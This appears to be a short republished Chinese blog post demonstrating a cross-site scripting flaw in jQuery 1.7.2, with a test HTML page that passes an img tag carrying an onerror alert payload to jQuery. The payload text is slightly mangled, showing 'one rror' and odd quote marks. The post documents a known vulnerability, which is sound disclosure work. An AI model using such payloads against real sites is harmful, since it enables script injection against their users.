首页 > 代码库 > JQuery-1.7.2.min.js跨站脚本漏洞
JQuery-1.7.2.min.js跨站脚本漏洞
测试页面:
<!DOCTYPE html>
<html>
<head>
<script src="http://x.x.x.x:80/js/jquery-1.7.2.min.js"></script>
<meta charset="utf-8">
<title>JS Bin</title>
</head>
<body>
JQuery Test:
http://x.x.x.x:80/js/jquery-1.7.2.min.js
<script>
var img = $("<img one rror=‘alert(/xss/);‘>");
img.attr(‘src‘,‘xx‘);
</script>
</body>
</html>
参考链接:
http://jsbin.com/xiyuwuvubu/edit?html,js,output
https://segmentfault.com/a/1190000002463775
本文出自 “Mask_X 博客” 博客,转载请与作者联系!
JQuery-1.7.2.min.js跨站脚本漏洞
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。